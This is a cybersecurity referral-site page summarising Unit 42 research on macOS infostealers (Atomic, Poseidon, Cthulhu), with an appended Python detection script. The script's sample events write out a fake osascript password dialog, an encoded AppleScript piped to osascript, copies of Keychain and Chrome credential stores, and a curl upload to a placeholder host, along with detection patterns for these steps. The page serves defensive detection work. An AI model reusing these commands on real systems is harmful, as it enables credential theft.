
Digital safety starts here for both commercial and personal use...

Defend Your Business Against the Latest WNY Cyber Threats
We offer safe, secure and affordable solutions for your business and personal networks and devices.



WNYCyber is there to help you choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet programmers who have to deal daily with cyber threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS' DATA... We built this website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do not charge or collect any fees.

Stealers on the Rise: A Closer Look at a Growing macOS Threat

Summary:
Palo Alto Networks' Unit 42 has observed a growing number of attacks targeting macOS users with infostealer malware. Infostealers are built to exfiltrate credentials, financial records and intellectual property, and a successful infection often leads to data breaches, financial loss and reputational damage. In a new blog post, the researchers profile three infostealers commonly used against macOS systems: Atomic, Poseidon and Cthulhu.

Discovered in April 2023, Atomic Stealer (also known as AMOS) is sold as malware-as-a-service (MaaS) on hacker forums and Telegram. Several variants of this infostealer have been observed in the wild, with earlier ones written in Go and newer ones in C++. Some versions include a Python script, while others use Mach-O binaries. Atomic Stealer is primarily distributed via malvertising and is capable of stealing sensitive information such as notes, documents, browser data (passwords, cookies), cryptocurrency wallets, and instant messaging data (e.g., from Discord and Telegram).

Poseidon Stealer is considered a direct competitor to, or fork of, Atomic Stealer. It was developed by an actor known as "Rodrigo4," believed to be a former Atomic Stealer coder. In August 2024, Rodrigo4 sold the Poseidon Stealer MaaS to an unknown entity, and researchers note it has remained active since then. Poseidon Stealer infects systems through trojanized installers disguised as legitimate applications, typically distributed via Google ads and malicious spam emails. The installer contains an encoded AppleScript that is decoded and executed during installation. That AppleScript gathers system information and steals browser passwords and cookies, cryptocurrency wallets, macOS Notes data, Telegram data, and passwords from the Bitwarden and KeePassXC password managers.

Cthulhu Stealer, another MaaS operation advertised on Telegram by the "Cthulhu Team," is written in Go and distributed through malicious application installers. When executed, it displays fake dialog boxes asking the user for their system password and their MetaMask password. Cthulhu Stealer targets a wide range of sensitive data on compromised macOS systems, including browser data (passwords, credit cards, history, cookies) from Chrome, Edge and Firefox; cryptocurrency wallets; FileZilla configuration files; Telegram data; Notes app content; and passwords from the Keychain and SafeStorage.

Security Officer Comments:
Infostealers were the largest category of new macOS malware in 2024, with a 101% increase in macOS infostealer detections between the last two quarters of the year. These strains are typically indiscriminate, aiming to collect as much data as possible for financial gain. That breadth exposes organizations to significant risk: leaked data, and stolen passwords and session cookies that serve as a gateway for more destructive follow-on attacks such as ransomware. macOS infostealers frequently rely on AppleScript, which offers extensive access to the operating system and, because of its natural-language syntax, makes it easy to script dialogs that look like legitimate system prompts. This lets threat actors deceive victims through social engineering, for example by prompting them to enter their password or to disable security controls.

Suggested Corrections:
Users should avoid clicking on sponsored ads at the top of Google search results, as cybercriminals can purchase these ads to promote sites offering cracked software that delivers infostealer payloads. Treat any installer that raises its own dialog asking for the macOS login password as hostile; Cthulhu Stealer's fake password prompt is exactly that. Organizations should also deploy endpoint detection and response tooling to identify and block the execution of malicious installers and scripts, implement multi-factor authentication wherever possible, and educate employees on phishing and social engineering tactics so they are less likely to fall victim to infection.
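The behaviours described above (a fake password dialog raised through osascript, an encoded AppleScript decoded and piped into osascript, copies of the Keychain and browser credential stores, then an HTTP upload) leave recognisable traces in process-execution telemetry, which is what the endpoint detection recommended here would consume. The following Python script is an added example, not code from Unit 42 or from this site: it runs four detection rules over a constructed set of process events and then correlates the findings per process tree so that a single password dialog does not page anyone on its own. The tab-separated event format, the sample command lines, the on-disk paths for each application and the example.invalid host are all assumptions made for illustration.

```python
"""Flag macOS infostealer behaviour in process-execution events. Added
example, not Unit 42's or WNYCyber's code; the event format, sample
events, file paths and hostname are constructed for illustration."""
import base64
import re
from collections import namedtuple

# Encoded AppleScript built here rather than hand-typed (a Poseidon-style
# installer ships a blob like this and decodes it at install time).
_ENCODED_PROMPT = base64.b64encode(
    b'display dialog "Enter your password" default answer "" with hidden answer'
).decode()

# Constructed sample events, tab separated: time, ppid, pid, command line.
# pids 613-617 imitate the chain described above; 700 and 701 are benign.
SAMPLE_EVENTS = (
    "2025-01-14T09:12:01Z\t512\t613\t/usr/bin/osascript -e 'display dialog "
    '"macOS needs to update settings" default answer "" with hidden answer'
    " with title \"System Preferences\"'\n"
    f"2025-01-14T09:12:03Z\t613\t614\t/bin/sh -c echo {_ENCODED_PROMPT} | base64 -d | osascript\n"
    "2025-01-14T09:12:05Z\t614\t615\t/bin/cp /Users/alice/Library/Keychains/login.keychain-db /tmp/.out/kc\n"
    '2025-01-14T09:12:06Z\t614\t616\t/bin/cp "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data" /tmp/.out/ld\n'
    "2025-01-14T09:12:07Z\t614\t617\t/usr/bin/curl -s -X POST --data-binary @/tmp/out.zip http://example.invalid/gate\n"
    "2025-01-14T09:15:00Z\t1\t700\t/usr/bin/osascript -e 'display notification \"Build finished\" with title \"CI\"'\n"
    "2025-01-14T09:16:00Z\t1\t701\t/bin/cp /Users/alice/notes.txt /Users/alice/Desktop/notes.bak\n"
)

# Rule 1: an osascript dialog collecting a hidden answer (fake password prompt).
PASSWORD_PROMPT = re.compile(r"display dialog\b.*\bdefault answer\b.*\bhidden answer\b", re.I)
# Rule 2: a base64 blob decoded straight into osascript (encoded installer script).
DECODE_TO_OSASCRIPT = re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*osascript", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SCRIPT_KEYWORDS = ("display dialog", "hidden answer", "do shell script")
# Rule 3: a copy/archive tool touching the stores the stealers above target.
# Assumed on-disk locations; verify against the apps deployed on your fleet.
SENSITIVE_PATHS = (
    "Library/Keychains/", "Google/Chrome/", "Microsoft Edge/", "Firefox/Profiles/",
    "Exodus/", "Electrum/", "Ledger Live/", "Telegram Desktop/", "group.com.apple.notes/",
    "FileZilla/", ".config/filezilla/", "Bitwarden/", ".kdbx",
)
COLLECTOR_TOOLS = {"cp", "ditto", "zip", "tar", "cat", "sqlite3", "rsync", "find", "osascript"}
# Rule 4: curl/wget sending a request body or file (the exfiltration step).
UPLOAD = re.compile(r"\b(curl|wget)\b.*(\s-X\s*POST\b|\s--data|\s-d\s|\s-F\s|\s-T\s|--post-file)", re.I)

Finding = namedtuple("Finding", "pid rule detail")


def parse_events(text):
    """Return (time, ppid, pid, cmd) tuples from the tab-separated format."""
    rows = [line.split("\t", 3) for line in text.splitlines() if line.strip()]
    return [(ts, int(ppid), int(pid), cmd) for ts, ppid, pid, cmd in rows]


def decoded_script_hint(cmd):
    """Base64-decode long blobs on the command line and report AppleScript
    keywords in the plaintext, so the analyst sees what would have run."""
    for blob in B64_BLOB.findall(cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore").lower()
        except ValueError:  # binascii.Error is a ValueError
            continue
        hits = [k for k in SCRIPT_KEYWORDS if k in text]
        if hits:
            return "decoded payload contains: " + ", ".join(hits)
    return None


def detect(text):
    """Apply the four rules to every event and return all findings."""
    findings = []
    for _ts, _ppid, pid, cmd in parse_events(text):
        tool = cmd.split()[0].rsplit("/", 1)[-1]
        if "osascript" in cmd and PASSWORD_PROMPT.search(cmd):
            findings.append(Finding(pid, "fake_password_prompt", "osascript dialog with hidden answer"))
        if DECODE_TO_OSASCRIPT.search(cmd):
            hint = decoded_script_hint(cmd) or "payload not recoverable from command line"
            findings.append(Finding(pid, "encoded_applescript", hint))
        if tool in COLLECTOR_TOOLS:
            hit = [p for p in SENSITIVE_PATHS if p in cmd]
            if hit:
                findings.append(Finding(pid, "credential_store_access", hit[0]))
        if UPLOAD.search(cmd):
            findings.append(Finding(pid, "http_upload", "curl/wget with request body or file"))
    return findings


def triage(text, min_rules=2):
    """Group findings by the root of their process tree and keep trees where at
    least min_rules distinct rules fired (one password dialog alone is noisy)."""
    parent = {pid: ppid for _ts, ppid, pid, _cmd in parse_events(text)}

    def root(pid):
        while parent.get(pid) in parent:
            pid = parent[pid]
        return pid

    rules_by_root = {}
    for f in detect(text):
        rules_by_root.setdefault(root(f.pid), set()).add(f.rule)
    return {r: sorted(v) for r, v in rules_by_root.items() if len(v) >= min_rules}


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule} ({f.detail})")
    print("suspicious process trees:", triage(SAMPLE_EVENTS))
```

On the sample, detect() fires once on each of pids 613 to 617 and on neither benign event, and triage() reports a single suspicious tree rooted at pid 613 with all four rules. The per-tree correlation is the part worth keeping when adapting this to real EDR exports: some legitimate installers do raise a password dialog, but a dialog followed in the same tree by Keychain or browser-store copies and an outbound upload is the infostealer pattern the article describes.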

Link(s):
https://unit42.paloaltonetworks.com/macos-stealers-growing/